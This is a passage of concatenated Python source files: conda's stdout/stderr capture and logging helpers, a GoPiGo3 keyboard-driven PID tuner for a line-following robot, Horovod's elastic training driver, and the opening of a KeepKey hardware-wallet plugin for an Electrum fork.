stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
def write_wrapper(self, to_write):
# This may have to deal with a *lot* of text.
if hasattr(self, 'mode') and 'b' in self.mode:
wanted = bytes
elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
wanted = bytes
else:
# ignore flake8 on this because it finds an error on py3 even though it is guarded
if sys.version_info[0] == 2:
wanted = unicode # NOQA
else:
wanted = str
if not isinstance(to_write, wanted):
if hasattr(to_write, 'decode'):
decoded = to_write.decode('utf-8')
self.old_write(decoded)
elif hasattr(to_write, 'encode'):
b = to_write.encode('utf-8')
self.old_write(b)
else:
self.old_write(to_write)
class CapturedText(object):
pass
# sys.stdout.write(u'unicode out')
# sys.stdout.write(bytes('bytes out', encoding='utf-8'))
# sys.stdout.write(str('str out'))
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
outfile = StringIO()
outfile.old_write = outfile.write
outfile.write = partial(write_wrapper, outfile)
sys.stdout = outfile
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
errfile = StringIO()
errfile.old_write = errfile.write
errfile.write = partial(write_wrapper, errfile)
sys.stderr = errfile
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.info("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(NOTSET)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(level)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False, fail_message="failed\n"):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
self.fail_message = fail_message
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write(self.fail_message)
else:
sys.stdout.write("done\n")
sys.stdout.flush()
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
def __init__(self):
self._shutdown = False
self._shutdownLock = Lock()
def submit(self, fn, *args, **kwargs):
with self._shutdownLock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = Future()
try:
result = fn(*args, **kwargs)
except BaseException as e:
f.set_exception(e)
else:
f.set_result(result)
return f
def map(self, func, *iterables):
for iterable in iterables:
for thing in iterable:
yield func(thing)
def shutdown(self, wait=True):
with self._shutdownLock:
self._shutdown = True
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
pid_tuner.py
|
from __future__ import print_function
from __future__ import division
from curtsies import Input
from easygopigo3 import EasyGoPiGo3
from di_sensors.easy_line_follower import EasyLineFollower
from threading import Thread, Event
import signal
from time import sleep, time
def drawLogo():
print(" _____ _____ _ _____ ____ ")
print(" / ____| | __ (_)/ ____| |___ \ ")
print(" | | __ ___ | |__) || | __ ___ __) |")
print(" | | |_ |/ _ \| ___/ | | |_ |/ _ \ |__ < ")
print(" | |__| | (_) | | | | |__| | (_) | ___) |")
print(" \_____|\___/|_| |_|\_____|\___/ |____/ ")
print(" ")
def drawDescription():
print("\nPress the following keys to run the features of the GoPiGo3/LineFollower.")
print("Press on the appropriate keys to tune the PID parameters for the line follower.\n")
def drawMenu():
"""
Prints all the key-bindings between the keys and the GoPiGo3/LineFollower's commands on the screen.
"""
keybindings = {
"<ESC>" : "Exit",
"x" : "Move the GoPiGo3 forward",
"<SPACE>" : "Stop the GoPiGo3 from moving",
"1" : "Increase loop frequency",
"2" : "Decrease loop frequency",
"3" : "Increase GoPiGo3 speed",
"4" : "Decrease GoPiGo3 speed",
"u" : "Increase the Kp gain",
"j" : "Increase the Ki gain",
"n" : "Increase the Kd gain",
"i" : "Decrease the Kp gain",
"k" : "Decrease the Ki gain",
"m" : "Decrease the Kd gain",
"r" : "Reset integral area for Ki gain to 0.0",
"w" : "Calibrate the line follower on a white surface",
"b" : "Calibrate the line follower on a black surface"
}
order_of_keys = ["<ESC>", "x", "<SPACE>", "1", "2", "3", "4", "u", "j", "n", "i", "k", "m", "r", "w", "b"]
try:
for key in order_of_keys:
print("\r[key {:8}] : {}".format(key, keybindings[key]))
except KeyError:
print("Error: Keys found in order_of_keys don't match with those in keybindings.")
print()
stopper = Event()
try:
gpg = EasyGoPiGo3()
except Exception as err:
print(str(err))
exit(1)
lf = EasyLineFollower()
stepSize = 0.1
loopFreq = 100.0
setPoint = 0.5
motorSpeed = 300
leftMotorSpeed = 0
rightMotorSpeed = 0
stopMotors = True
Kp = 0.0
Ki = 0.0
Kd = 0.0
integralArea = 0.0
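# PID control loop: read the line position, compute a correction from the Kp/Ki/Kd gains,
# and drive the two motors at the configured loop frequency until the stopper event is set.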
def controller():
    global stopper, gpg, lf, stepSize, loopFreq, setPoint, motorSpeed, leftMotorSpeed, rightMotorSpeed, stopMotors, Kp, Ki, Kd
global integralArea
loopPeriod = 1 / loopFreq
integralArea = 0.0
previousError = 0.0
try:
while not stopper.is_set():
start = time()
# <0.5 when line is on the left
# >0.5 when line is on the right
current, _ = lf.read('weighted-avg')
# calculate correction
error = current - setPoint
if Ki < 0.0001 and Ki > -0.0001:
integralArea = 0.0
else:
integralArea += error
correction = Kp * error + Ki * integralArea + Kd * (error - previousError)
# print(Kp * error, Ki * integralArea, Kd * (error - previousError))
previousError = error
            # calculate motor speeds
leftMotorSpeed = int(motorSpeed + correction)
rightMotorSpeed = int(motorSpeed - correction)
if leftMotorSpeed == 0: leftMotorSpeed = 1
if rightMotorSpeed == 0: rightMotorSpeed = 1
# if leftMotorSpeed >= 300: leftMotorSpeed = 299
# if rightMotorSpeed >= 300: rightMotorSpeed = 299
# update motor speeds
if stopMotors is False:
gpg.set_motor_dps(gpg.MOTOR_LEFT, dps=leftMotorSpeed)
gpg.set_motor_dps(gpg.MOTOR_RIGHT, dps=rightMotorSpeed)
# make the loop work at a given frequency
end = time()
delayDiff = end - start
if loopPeriod - delayDiff > 0:
sleep(loopPeriod - delayDiff)
except Exception as err:
print(str(err))
stopper.set()
finally:
gpg.stop()
def Main():
drawLogo()
drawDescription()
drawMenu()
refresh_rate = 20.0
period = 1.0 / refresh_rate
controlThread = Thread(target = controller)
controlThread.start()
global stopper, gpg, lf, stepSize, loopFreq, motorSpeed, leftMotorSpeed, rightMotorSpeed, stopMotors, Kp, Ki, Kd
global integralArea
with Input(keynames = "curtsies", sigint_event = True) as input_generator:
while True:
# if nothing is captured in [period] seconds
# then send() function returns None
key = input_generator.send(period)
if key is None:
continue
if stopper.is_set():
# exit
gpg.stop()
break
if key == "<ESC>":
# exit
stopper.set()
break
if key == "x":
stopMotors = False
if key == "<SPACE>":
stopMotors = True
sleep(0.1)
gpg.stop()
if key == "1":
loopFreq += 1.0
if key == "2":
loopFreq -= 1.0
if key == "3":
motorSpeed += 1
if key == "4":
motorSpeed -= 1
if key == "u":
Kp += 5.0
if key == "j":
Ki += 0.001
if key == "n":
Kd += 100.0
if key == "i":
Kp -= 5.0
if key == "k":
Ki -= 0.001
if key == "m":
Kd -= 100.0
if key == "r":
integralArea = 0.0
if key == "w":
lf.set_calibration('white')
if key == "b":
lf.set_calibration('black')
print('Kp={:3f} Ki={:3f} Kd={:3f} L={:3d} R={:3d} ErrorArea={:3f} LoopFreq={:3d} Speed={:3d}'.format(Kp, Ki, Kd, leftMotorSpeed, rightMotorSpeed, integralArea, int(loopFreq), motorSpeed))
controlThread.join()
if __name__ == "__main__":
    signal.signal(signal.SIGTSTP, lambda signum, frame: print("Press the appropriate key to close the app."))
try:
Main()
except IOError as error:
print(str(error))
exit(1)
exit(0)
|
driver.py
|
# Copyright 2020 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import logging
import os
import queue
import threading
import time
from collections import defaultdict
from horovod.runner.common.util import hosts, timeout
from horovod.runner.elastic.discovery import HostManager
from horovod.runner.elastic.registration import WorkerStateRegistry
from horovod.runner.elastic.worker import WorkerNotificationClient
DISCOVER_HOSTS_FREQUENCY_SECS = 1.0
ELASTIC_TIMEOUT_SECS = 600
def _epoch_time_s():
return int(time.time())
class Results(object):
def __init__(self, error_message, worker_results):
self.error_message = error_message
self.worker_results = worker_results
class ResultsRecorder(object):
def __init__(self):
self._error_message = None
self._worker_results = {}
self._worker_threads = queue.Queue()
def expect(self, worker_thread):
self._worker_threads.put(worker_thread)
def set_error_message(self, error_message):
self._error_message = error_message
def add_result(self, key, value):
if key in self._worker_results:
return
self._worker_results[key] = value
def get_results(self):
while not self._worker_threads.empty():
worker_thread = self._worker_threads.get()
worker_thread.join()
return Results(self._error_message, self._worker_results)
class ElasticDriver(object):
def __init__(self, rendezvous, discovery, min_np, max_np, timeout=None, reset_limit=None, verbose=0):
self._rendezvous = rendezvous
self._host_manager = HostManager(discovery)
self._min_np = min_np
self._max_np = max_np
self._verbose = verbose
self._host_assignments = {}
self._rank_assignments = {}
self._world_size = 0
self._wait_hosts_cond = threading.Condition()
self._timeout = timeout or int(os.getenv('HOROVOD_ELASTIC_TIMEOUT', ELASTIC_TIMEOUT_SECS))
self._create_worker_fn = None
self._worker_clients = {}
self._worker_registry = WorkerStateRegistry(self, self._host_manager, reset_limit=reset_limit)
self._results = ResultsRecorder()
self._shutdown = threading.Event()
self._discovery_thread = threading.Thread(target=self._discover_hosts)
self._discovery_thread.daemon = True
self._discovery_thread.start()
def start(self, np, create_worker_fn):
self._create_worker_fn = create_worker_fn
self._activate_workers(np)
def resume(self):
self._activate_workers(self._min_np)
def stop(self, error_message=None):
self._results.set_error_message(error_message)
self._shutdown.set()
self._rendezvous.stop()
self._discovery_thread.join()
def finished(self):
return self._shutdown.is_set()
def get_results(self):
return self._results.get_results()
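    # Register a worker's notification endpoint so the driver can push host-change updates to it.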
def register_worker_server(self, host, slot, addresses, secret_key):
self._worker_clients[(host, slot)] = WorkerNotificationClient(
addresses, secret_key, self._verbose)
def get_worker_client(self, slot_info):
return self._worker_clients.get((slot_info.hostname, slot_info.local_rank))
def record_ready(self, host, slot):
self._worker_registry.record_ready(host, slot)
def world_size(self):
return self._world_size
def local_size(self, host):
return len(self._host_assignments[host])
def get_slot_info(self, host, slot):
return self._host_assignments[host][slot] if self.has_rank_assignment(host, slot) \
else hosts.INVALID_SLOT_INFO
def get_coordinator_info(self):
return self._rank_assignments.get(0)
def has_rank_assignment(self, host, slot):
if self._host_manager.is_blacklisted(host):
return False
return host in self._host_assignments and len(self._host_assignments[host]) > slot
@property
def host_assignments(self):
return self._host_assignments
def wait_for_available_slots(self, min_np, min_hosts=1):
extra_message = ' An elastic job also requires that at least two hosts ' \
'are available to resolve compatible network interfaces. If you know which interfaces ' \
'are compatible in your network, set `--network-interface` to skip this check.' \
if min_hosts > 1 else ''
tmout = timeout.Timeout(
self._timeout,
message='Timed out waiting for {{activity}}. Please check that you have '
'enough resources to run at least {min_np} Horovod processes.{extra_message}'
.format(min_np=min_np, extra_message=extra_message))
self._wait_hosts_cond.acquire()
try:
while True:
current_hosts = self._host_manager.current_hosts
avail_slots = current_hosts.count_available_slots()
logging.debug(f"current available slots: {avail_slots}")
avail_hosts = len(current_hosts.available_hosts)
logging.debug(f"current available hosts: {avail_hosts}.")
if avail_slots >= min_np and avail_hosts >= min_hosts:
return current_hosts
if self._shutdown.is_set():
raise RuntimeError('Job has been shutdown, see above error messages for details.')
self._wait_hosts_cond.wait(tmout.remaining())
tmout.check_time_out_for('minimum number of slots to become available')
finally:
self._wait_hosts_cond.release()
def _activate_workers(self, min_np):
logging.info('wait for available slots: {}'.format(min_np))
current_hosts = self.wait_for_available_slots(min_np)
pending_slots = self._update_host_assignments(current_hosts)
self._worker_registry.reset(self.world_size())
self._start_worker_processes(pending_slots)
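    # Background discovery loop: poll for host changes, notify the coordinator worker,
    # and wake any threads waiting for slots to become available.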
def _discover_hosts(self):
first_update = True
while not self._shutdown.is_set():
self._wait_hosts_cond.acquire()
try:
if self._host_manager.update_available_hosts():
self._notify_workers_host_changes(self._host_manager.current_hosts)
self._wait_hosts_cond.notify_all()
except RuntimeError as e:
if first_update:
# Misconfiguration, fail the job immediately
self._shutdown.set()
self._wait_hosts_cond.notify_all()
raise
# Transient error, retry until timeout
logging.warning(str(e))
finally:
self._wait_hosts_cond.release()
first_update = False
self._shutdown.wait(DISCOVER_HOSTS_FREQUENCY_SECS)
def _notify_workers_host_changes(self, current_hosts):
next_host_assignments = {}
if current_hosts.count_available_slots() >= self._min_np:
# Assignments are required to be stable via contract
next_host_assignments, _ = self._get_host_assignments(current_hosts)
if next_host_assignments == self.host_assignments:
# Skip notifying workers when host changes would not result in changes of host assignments
logging.debug('no host assignment changes, skipping notifications')
return
coordinator_slot_info = self.get_coordinator_info()
if not coordinator_slot_info:
logging.debug('no coordinator info, skipping notifications')
return
coordinator_client = self.get_worker_client(coordinator_slot_info)
if not coordinator_client:
logging.debug('no coordinator client, skipping notifications')
return
timestamp = _epoch_time_s()
try:
coordinator_client.notify_hosts_updated(timestamp)
except:
if self._verbose >= 2:
logging.exception('failed to notify {}[{}] of host updates'
.format(coordinator_slot_info.hostname,
coordinator_slot_info.local_rank))
def _update_host_assignments(self, current_hosts):
# Determine the slots that are already filled so we do not respawn these processes
active_slots = set([(host, slot_info.local_rank)
for host, slots in self._host_assignments.items()
for slot_info in slots])
# Adjust the host assignments to account for added / removed hosts
host_assignments, host_assignments_list = self._get_host_assignments(current_hosts)
if len(self._host_assignments) > 0:
# Ensure that at least one previously active host is still assigned, otherwise there is no
# way to sync the state to the new workers
prev_hosts = self._host_assignments.keys()
next_hosts = host_assignments.keys()
if not prev_hosts & next_hosts:
raise RuntimeError('No hosts from previous set remaining, unable to broadcast state.')
self._host_assignments = host_assignments
self._world_size = len(host_assignments_list)
self._rendezvous.init(host_assignments_list)
# Rank assignments map from world rank to slot info
rank_assignments = {}
for slot_info in host_assignments_list:
rank_assignments[slot_info.rank] = slot_info
self._rank_assignments = rank_assignments
# Get the newly assigned slots that need to be started
pending_slots = [slot_info
for host, slots in self._host_assignments.items()
for slot_info in slots
if (host, slot_info.local_rank) not in active_slots]
return pending_slots
def _get_host_assignments(self, current_hosts):
# Adjust the host assignments to account for added / removed hosts
host_list = [hosts.HostInfo(host, current_hosts.get_slots(host))
for host in current_hosts.host_assignment_order]
host_assignments_list = hosts.get_host_assignments(host_list, self._min_np, self._max_np)
host_assignments = defaultdict(list)
for slot_info in host_assignments_list:
host_assignments[slot_info.hostname].append(slot_info)
return host_assignments, host_assignments_list
def _start_worker_processes(self, pending_slots):
for slot_info in pending_slots:
logging.info('start worker process: {}[{}]'.format(slot_info.hostname, slot_info.local_rank))
self._start_worker_process(slot_info)
def _start_worker_process(self, slot_info):
create_worker_fn = self._create_worker_fn
shutdown_event = self._shutdown
host_event = self._host_manager.get_host_event(slot_info.hostname)
def run_worker():
res = create_worker_fn(slot_info, [shutdown_event, host_event])
exit_code, timestamp = res
self._handle_worker_exit(slot_info, exit_code, timestamp)
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
self._results.expect(thread)
def _handle_worker_exit(self, slot_info, exit_code, timestamp):
if not self.has_rank_assignment(slot_info.hostname, slot_info.local_rank):
# Ignore hosts that are not assigned a rank
logging.debug('host {} has been blacklisted, ignoring exit from local_rank={}'
.format(slot_info.hostname, slot_info.local_rank))
return
if exit_code == 0:
rendezvous_id = self._worker_registry.record_success(slot_info.hostname, slot_info.local_rank)
else:
rendezvous_id = self._worker_registry.record_failure(slot_info.hostname, slot_info.local_rank)
if self.finished() and self._worker_registry.last_rendezvous() == rendezvous_id:
logging.debug('adding results for {}[{}]: ({}, {})'
.format(slot_info.hostname, slot_info.local_rank, exit_code, timestamp))
name = '{}[{}]'.format(slot_info.hostname, slot_info.local_rank)
self._results.add_result(name, (exit_code, timestamp))
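# ---------------------------------------------------------------------------
# Illustrative sketch (added; not part of the original driver). Under the
# assumption of a SlotInfo-like object carrying `hostname`, `local_rank` and
# `rank` fields, it shows how a flat list of per-rank slot assignments groups
# into the host -> [slots] map built by _get_host_assignments above. The names
# SlotInfoExample and group_slots_by_host are hypothetical helpers used only
# for this example.
from collections import defaultdict, namedtuple

SlotInfoExample = namedtuple('SlotInfoExample', ['hostname', 'local_rank', 'rank'])

def group_slots_by_host(slot_infos):
    """Group per-rank slot infos into a mapping of hostname -> list of slots."""
    assignments = defaultdict(list)
    for slot in slot_infos:
        assignments[slot.hostname].append(slot)
    return assignments

# Example: two hosts with two slots each give a world size of four.
# group_slots_by_host([SlotInfoExample('host-a', 0, 0), SlotInfoExample('host-a', 1, 1),
#                      SlotInfoExample('host-b', 0, 2), SlotInfoExample('host-b', 1, 3)])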
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electrum_nyc.util import bfh, bh2u
from electrum_nyc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants,
is_segwit_address)
from electrum_nyc.i18n import _
from electrum_nyc.plugins import BasePlugin
from electrum_nyc.transaction import deserialize
from electrum_nyc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_nyc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
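# Note (added): purpose 49' marks BIP49 (P2WPKH nested in P2SH) derivations.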
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# Disable the bridge transport because it seems to never return when a KeepKey is plugged in.
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# Returns the client for a given keystore; the xpub can be used to identify it.
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
